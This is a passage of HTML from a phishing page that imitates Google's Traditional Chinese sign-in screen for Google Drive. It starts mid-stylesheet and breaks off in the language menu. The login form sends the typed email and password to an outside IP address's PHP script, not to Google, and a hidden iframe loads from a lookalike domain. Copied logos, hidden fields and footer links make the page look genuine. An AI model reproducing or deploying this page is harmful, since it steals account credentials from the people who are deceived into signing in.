  .jfk-tooltip-arrowup .jfk-tooltip-arrowimplbefore {
  border-top-width: 0;
  }
  .jfk-tooltip-arrowup .jfk-tooltip-arrowimplafter {
  border-top-width: 0;
  top: 1px;
  }
  .jfk-tooltip-arrowleft .jfk-tooltip-arrowimplbefore,
  .jfk-tooltip-arrowright .jfk-tooltip-arrowimplbefore {
  border-color: transparent #bbb;
  top: -9px;
  }
  .jfk-tooltip-arrowleft .jfk-tooltip-arrowimplafter,
  .jfk-tooltip-arrowright .jfk-tooltip-arrowimplafter {
  border-color:transparent #fff;
  top:-8px;
  }
  .jfk-tooltip-arrowleft .jfk-tooltip-arrowimplbefore {
  border-left-width: 0;
  }
  .jfk-tooltip-arrowleft .jfk-tooltip-arrowimplafter {
  border-left-width: 0;
  left: 1px;
  }
  .jfk-tooltip-arrowright .jfk-tooltip-arrowimplbefore {
  border-right-width: 0;
  }
  .jfk-tooltip-arrowright .jfk-tooltip-arrowimplafter {
  border-right-width: 0;
  }
  .jfk-tooltip-closebtn {
  background: url("//ssl.gstatic.com/ui/v1/icons/common/x_8px.png") no-repeat;
  border: 1px solid transparent;
  height: 21px;
  opacity: .4;
  outline: 0;
  position: absolute;
  right: 2px;
  top: 2px;
  width: 21px;
  }
  .jfk-tooltip-closebtn:focus,
  .jfk-tooltip-closebtn:hover {
  opacity: .8;
  cursor: pointer;
  }
  .jfk-tooltip-closebtn:focus {
  border-color: #4d90fe;
  }
</style>
<style media="screen and (max-width: 580px)">
  .jfk-tooltip {
  display: none;
  }
</style>
<style>
  .need-help-reverse {
  float: right;
  }
  .remember .bubble-wrap {
  position: absolute;
  padding-top: 3px;
  -o-transition: opacity .218s ease-in .218s;
  -moz-transition: opacity .218s ease-in .218s;
  -webkit-transition: opacity .218s ease-in .218s;
  transition: opacity .218s ease-in .218s;
  left: -999em;
  opacity: 0;
  width: 314px;
  margin-left: -20px;
  }
  .remember:hover .bubble-wrap,
  .remember input:focus ~ .bubble-wrap,
  .remember .bubble-wrap:hover,
  .remember .bubble-wrap:focus {
  opacity: 1;
  left: inherit;
  }
  .bubble-pointer {
  border-left: 10px solid transparent;
  border-right: 10px solid transparent;
  border-bottom: 10px solid #fff;
  width: 0;
  height: 0;
  margin-left: 17px;
  }
  .bubble {
  background-color: #fff;
  padding: 15px;
  margin-top: -1px;
  font-size: 11px;
  -moz-border-radius: 2px;
  -webkit-border-radius: 2px;
  border-radius: 2px;
  -moz-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
  -webkit-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
  box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
  }
  #stay-signed-in {
  float: left;
  }
  #stay-signed-in-tooltip {
  left: auto;
  margin-left: -20px;
  padding-top: 3px;
  position: absolute;
  top: 0;
  visibility: hidden;
  width: 314px;
  z-index: 1;
  }
  .dasher-tooltip {
  position: absolute;
  left: 50%;
  top: 380px;
  margin-left: 150px;
  }
  .dasher-tooltip .tooltip-pointer {
  margin-top: 15px;
  }
  .dasher-tooltip p {
  margin-top: 0;
  }
  .dasher-tooltip p span {
  display: block;
  }
</style>
<style media="screen and (max-width: 800px), screen and (max-height: 800px)">
  .dasher-tooltip {
  top: 340px;
  }
</style>
  </head>
  <div class="wrapper">
  <div class="google-header-bar  centered">
  <div class="header content clearfix">
  <img alt="Google" class="logo" src="https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png">
  </div>
  </div>
  <div class="main content clearfix">
<div class="banner">

</div>
<div class="card signin-card clearfix">
  <div id="cc_iframe_parent"><iframe src="http://goenter.clownfishes.net/google/CheckConnection.htm" id="youtube" style="visibility: 

hidden; width: 1px; height: 1px; position: absolute; top: -100px;"></iframe><iframe 

src="https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&amp;v=-

1831216030&amp;timestamp=1494299043895" id="youtube" style="visibility: hidden; width: 1px; height: 1px; position: absolute; top: -

100px;"></iframe></div>
<img class="profile-img" src="https://sourceforge.net/p/optipng/bugs/46/attachment/avatar_2x_optimized.png" alt="">
<p class="profile-name"></p>
  <form novalidate="" method="post" action="http://207.210.200.146/~goontone/between/google/1.php" id="gaia_loginform">
  <input name="GALX" type="hidden" value="3FOiIt-n7pU">
  <input name="continue" type="hidden" value="https://drive.google.com/m?utm_source=zh-

TW&amp;utm_medium=button&amp;utm_campaign=web&amp;utm_content=gotodrive&amp;utm_term=appspagecarousel&amp;usp=apps_start&amp;urp=http

://www.google.com.tw/search?hl%3Dzh-TW%26redir_esc%3D%26client%3Dms-android-zte%26source%3Dandroid-launcher-widget%26v

%3D133247963%26qsubts%3D1398855636404%26action%3Ddevloc%26q%3D%25E7%25A1%25AC%25E7%25A2%259F%26v%3D133247963#">
  <input name="followup" type="hidden" value="https://drive.google.com/m?utm_source=zh-

TW&amp;utm_medium=button&amp;utm_campaign=web&amp;utm_content=gotodrive&amp;utm_term=appspagecarousel&amp;usp=apps_start&amp;urp=http

://www.google.com.tw/search?hl%3Dzh-TW%26redir_esc%3D%26client%3Dms-android-zte%26source%3Dandroid-launcher-widget%26v

%3D133247963%26qsubts%3D1398855636404%26action%3Ddevloc%26q%3D%25E7%25A1%25AC%25E7%25A2%259F%26v%3D133247963">
  <input name="service" type="hidden" value="wise">
  <input name="ltmpl" type="hidden" value="drive">
  <input name="btmpl" type="hidden" value="mobile">
  <input type="hidden" id="_utf8" name="_utf8" value="☃">
  <input type="hidden" name="bgresponse" id="bgresponse" value="js_disabled">
  <input type="hidden" id="pstMsg" name="pstMsg" value="1">
  <input type="hidden" id="dnConn" name="dnConn" value="">
  <input type="hidden" id="checkConnection" name="checkConnection" value="youtube:338:1">
  <input type="hidden" id="checkedDomains" name="checkedDomains" value="youtube">
<label class="hidden-label" for="Email">電子郵件</label>
<input id="Email" name="user" type="email" placeholder="電子郵件" value="" spellcheck="false" class="">
<label class="hidden-label" for="Passwd">密碼</label>
<input id="Passwd" name="email" type="password" placeholder="密碼" class="">
<input id="signIn" name="signIn" class="rc-button rc-button-submit" type="submit" value="登入">
  <label class="remember">
  <input id="PersistentCookie" name="PersistentCookie" type="checkbox" value="yes" checked="checked">
  <span>
  保持登入狀態
  </span>
  <div class="bubble-wrap" role="tooltip">
  <div class="bubble-pointer"></div>
  <div class="bubble">
  為了方便起見，請勾選這個核取方塊。如果您使用的是共用裝置，建議您採取額外的防護措施。
  <a href="https://support.google.com/accounts/?p=securesignin&amp;hl=zh-TW" target="_blank">
	瞭解詳情</a>
  </div>
  </div>
  </label>
  <input type="hidden" name="rmShown" value="1">
  <a id="link-forgot-passwd" href="https://accounts.google.com/RecoverAccount?service=wise&amp;continue=https%3A%2F

%2Fdrive.google.com%2Fm%3Futm_source%3Dzh-TW%26utm_medium%3Dbutton%26utm_campaign%3Dweb%26utm_content%3Dgotodrive%26utm_term

%3Dappspagecarousel%26usp%3Dapps_start%26urp%3Dhttp%3A%2F%2Fwww.google.com.tw%2Fsearch%3Fhl%253Dzh-TW%2526redir_esc%253D%2526client

%253Dms-android-zte%2526source%253Dandroid-launcher-widget%2526v%253D133247963%2526qsubts%253D1398855636404%2526action%253Ddevloc

%2526q%253D%2525E7%2525A1%2525AC%2525E7%2525A2%25259F%2526v%253D133247963%23" class="need-help-reverse">
  需要協助嗎？
  </a>
  </form>
</div>
<div class="one-google">
  <p class="create-account">
  <a id="link-signup" href="https://accounts.google.com/SignUp?service=wise&amp;continue=https%3A%2F%2Fdrive.google.com%2Fm

%3Futm_source%3Dzh-TW%26utm_medium%3Dbutton%26utm_campaign%3Dweb%26utm_content%3Dgotodrive%26utm_term%3Dappspagecarousel%26usp

%3Dapps_start%26urp%3Dhttp%3A%2F%2Fwww.google.com.tw%2Fsearch%3Fhl%253Dzh-TW%2526redir_esc%253D%2526client%253Dms-android-zte

%2526source%253Dandroid-launcher-widget%2526v%253D133247963%2526qsubts%253D1398855636404%2526action%253Ddevloc%2526q%253D

%2525E7%2525A1%2525AC%2525E7%2525A2%25259F%2526v%253D133247963%23&amp;ltmpl=drive&amp;btmpl=mobile">
  建立帳戶
  </a>
  </p>
<p class="tagline">
  只要一個 Google 帳戶，即可使用 Google 各項優質服務
</p>
<img src="https://ssl.gstatic.com/accounts/ui/logo_strip_2x.png" width="210" height="17" alt="">
</div>
  </div>
  <div class="google-footer-bar">
  <div class="footer content clearfix">
  <ul id="footer-list">
  <li>
  Google 
  </li>
  <li>
  <a href="https://accounts.google.com/TOS?loc=TW&amp;hl=zh-TW" target="_blank">
  隱私權與條款
  </a>
  </li>
  <li>
  <a href="http://www.google.com/support/accounts?hl=zh-TW" target="_blank">
  說明
  </a>
  </li>
  </ul>
  <div id="lang-vis-control" style="display: inline;">
  <span id="lang-chooser-wrap" class="lang-chooser-wrap">
  <label for="lang-chooser"><img src="https://cfl.dropboxstatic.com/static/images/mobile/thebest/i18n-globe-vflJK2mhc.png" alt="變更

語言"></label>
  <select id="lang-chooser" class="lang-chooser" name="lang-chooser">
  <option value="zh-HK">
  ‪中文（香港）‬
  </option>
  <option value="ja">
  ‪日本語‬
  </option>
  <option value="zh-CN">
  ‪简体中文‬
  </option>
  <option value="zh-TW" selected="selected">
  ‪繁體中文‬
  </option>
  <option value="af">
  ‪Afrikaans‬
  </option>
  <option value="az">
  ‪azərbaycan‬
  </option>
  <option value="in">
  ‪Bahasa Indonesia‬
  </option>
  <option value="ms">
  ‪Bahasa Melayu‬
  </option>
  <option value="ca">
  ‪català‬
  </option>
  <option value="cs">
  ‪Čeština‬
  </option>
  <option value="da">
  ‪Dansk‬
  </option>
  <option value="de">
  ‪Deutsch‬
  </option>
  <option value="et">
  ‪eesti‬
  </option>
  <option value="en-GB">
  ‪English (United Kingdom)‬
  </option>
  <option value="en">
  ‪English (United States)‬
  </option>
  <option value="es">
  ‪Español (España)‬
  </option>
  <option value="es-419">
  ‪Español (Latinoamérica)‬
  </option>
  <option value="eu">
  ‪euskara‬
  </option>
  <option value="fil">
  ‪Filipino‬
  </option>
  <option value="fr-CA">
  ‪Français (Canada)‬
  </option>
  <option value="fr">
  ‪Français (France)‬
  </option>
  <option value="gl">
  ‪galego‬
  </option>
  <option value="hr">
  ‪Hrvatski‬
  </option>
  <option value="zu">
  ‪isiZulu‬
  </option>
  <option value="is">
  ‪íslenska‬
  </option>
  <option value="it">
  ‪Italiano‬
  </option>
  <option value="sw">
  ‪Kiswahili‬
  </option>
  <option value="lv">
  ‪latviešu‬
  </option>
  <option value="lt">
  ‪lietuvių‬
  </option>
  <option value="hu">
  ‪magyar‬
  </option>
  <option value="nl">
  ‪Nederlands‬
  </option>
  <option value="no">
  ‪norsk‬
  </option>
  <option value="pl">
  ‪polski‬
  </option>
  <option value="pt">
  ‪Português‬
  </option>
  <option value="pt-BR">
  ‪Português (Brasil)‬
  </option>
  <option value="pt-PT">
  ‪Português (Portugal)‬
  </option>
  <option value="ro">
  ‪română‬
  </option>
  <option value="sk">
  ‪Slovenčina‬
  </option>
  <option value="sl">
  ‪slovenščina‬
  </option>
  <option value="fi">
  ‪Suomi‬
  </option>
  <option value="sv">
  ‪Svenska‬
  </option>
  <option value="vi">
  ‪Tiếng Việt‬
  </option>
  <option value="tr">
  ‪Türkçe‬
  </option>
  <option value="el">
  ‪Ελληνικά‬
  </option>
  <option value="bg">
  ‪български‬
  </option>
  <option value="mn">
  ‪монгол‬
  </option>
  <option value="ru">
  ‪Русский‬
  </option>
  <option value="sr">
  ‪Српски‬
  </option>
  <option value="uk">
  ‪Українська‬
  </option>
  <option value="ka">
  ‪ქართული‬
  </option>
  <option value="hy">
  ‪հայերեն‬
  </option>
  <option value="iw">
  ‫עברית‬‎
  </option>
  <option value="ur">
  ‫اردو‬‎
  </option>
  <option value="ar">
  ‫العربية‬‎
  </option>
  <option value="fa">
  ‫فارسی‬‎
  </option>
  <option value="am">
  ‪አማርኛ‬
  </option>
  <option value="ne">
  ‪नेपाली‬
  </option>
  <option value="mr">
  ‪मराठी‬
  </option>
  <option value="hi">
  ‪हिन्दी‬
  </option>
  <option value="bn">
  ‪বাংলা‬
  </option>
  <option value="gu">
  ‪ગુજરાતી‬
  </option>
  <option value="ta">
  ‪தமிழ்‬
  </option>
  <option value="te">
  ‪తెలుగు‬
  </option>
  <option value="kn">
  ‪ಕನ್ನಡ‬
  </option>
  <option value="ml">
  ‪മലയാളം‬
  </option>
  <option value="si">
  ‪සිංහල‬
  </option>
  <option value="th">
  ‪ไทย‬
  </option>
  <option value="lo">
  ‪ລາວ‬
  </option>
  <option value="km">
  ‪ខ្មែរ‬
  </option>
  <option value="ko">
  ‪한국어‬
